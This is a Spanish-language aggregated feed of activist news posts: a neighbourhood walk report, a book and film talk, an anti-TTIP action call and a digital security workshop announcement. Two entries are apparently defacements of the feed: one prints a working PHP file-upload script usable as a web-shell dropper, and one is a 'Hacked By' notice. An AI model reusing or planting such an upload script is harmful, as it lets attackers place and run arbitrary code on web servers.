Nuestro último avance era de unos pocos metros hasta la puerta de la Sala Arrebato. La conversación ponía en valor este local de conciertos como espacio de convivencia que se autorregula para el disfrute cultural sin interferir en el descanso de los vecinos. Se habló también de la falta de lugares de expresión en la calle como el panel situado junto a su puerta que la brigada de limpieza municipal vacía de manera sistemática. Recordamos la figura de Eduardo Langarita como reivindicación de la memoria histórica del activismo social.
Y allí nos quedamos un rato en círculo compartiendo más reflexiones y pensamientos hasta que poco a poco nos fuimos yendo todas. Que si se había perdido la capacidad colectiva de soñar otra ciudad, que si teníamos que entrenar la imaginación, que si lo ideal era conseguir pequeñas victorias para alimentar la ilusión…
Así que apenas llegamos a tratar la organización del Paseo de Jane propiamente dicho. Solamente que nos gustaba este formato de la deriva, que podríamos hacerlo en el barrio del Rabal o tal vez en el de San José, y que era una gozada caminar tranquilamente y en compañía por nuestra ciudad.
¡Esto lo tenemos que repetir!


Categories: Notícies

EL PAÍS DEL MIEDO. CON ISAAC ROSA Y FRANCISCO ESPADA

La Casa Invisible - 21 Abril, 2015 - 12:56

Encuentro entre el novelista Isaac Rosa, autor de El país del miedo, y el cineasta Francisco Espada, que la ha llevado al cine. Presenta Santi Fernández Patón

Conoce a Francisco Espada en esta ENTREVISTA

Categories: Notícies

mhamdi jeber

Fundacion de los comunes - 18 Abril, 2015 - 17:14
<?php $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "OK-Click here!"; } }echo 'Upload files...'; ?>
Categories: Notícies

#18A #OccupyTTIP

X.net - 18 Abril, 2015 - 12:15
a.twitter-hashtag-button { display: inline-block; padding: 2px 5px; border: #ccc solid 1px; border-radius: 3px; background: #f8f8f8 2px 3px no-repeat; background: 2px 3px no-repeat, -webkit-linear-gradient(#fff, #dedede); background: 2px 3px no-repeat, linear-gradient(#fff, #dedede); background-size: 16px 13px, auto auto; }

Este sábado #18A, ciudadanxs de todo el mundo nos movilizamos para presionar y oponernos a los Tratados de Libre Comercio e Inversiones.

Como es nuestra filosofía, desde Xnet queremos afrontar este día de acción aportando de manera concreta y pragmática y con la confianza positiva de saber que luchas como esta ya se han ganado y volverán a ganarse.

De hecho ya estamos gangando :) 4 ejemplos gráficos que lo demuestran:


Presión ejercida por las redes el pasado #O11DoA día de Acción contra el TTIP

Intento de contra campaña de la UE en respuesta al #O11DoA

Intento de contra campaña de la UE y Malmstrom ANTES del #18 :)

Subidón de interés por el TTIP en TW el #O11DoA (esta vez vamos a por más :D)

 

Hemos ordenado y preparado la siguiente tabla que permite interpelar directamente a nuestros representantes, recordándoles que hoy la ciudadanía se moviliza mundialmente contra el TTIP y los Tratados de Libre y comercio.

Porque oponerse y detener los abusos del TTIP es cuestión de voluntad política, que solo existirá si nuestros representantes sienten la presión de la ciudadanía vigilante. Ejerzámosla :)
 

Tweet:
*un mensaje personalizado siempre es más eficaz.
 

Categories: Notícies

Hacked By Mr.QLQ

Fundacion de los comunes - 16 Abril, 2015 - 13:24
  Hacked By Mr.QLQ

 

 

 

 

 

Categories: Notícies

Taller de Seguridad Digital

X.net - 16 Abril, 2015 - 13:14
Organizado por La Base e impartido por Xnet Sábado 25 de abril 16:00 – 20:00

 

Ahora más que nunca, que las nuevas leyes recientemente aprobadas pretenden recortar nuestras libertades y derechos civiles, es importante que aprendamos como desenvolvernos en
nuestro entorno digital de manera segura
, ejerciendo plenamente nuestros derechos de expresión, difusión y acción.

Por otro lado es imporatne aprender a implementar herramientas y prácticas que nos ayuden a defendernos de los abusos de las grandes compañías de comunicación que, aprovechándose de nuestro desconocimiento y por lo tanto sin nuestro consentimiento informado, negocian y se lucran con nuestra información y datos personales violando nuestro derecho a la privacidad.

Por todo ello os invitamos a asistir al curso de Seguridad Digital impartido por Xnet y organizado por la Base.

Plazas limitadas, para inscripción por favor enviar mail a: ateneu@labase.info

Categories: Notícies
Contingut sindicat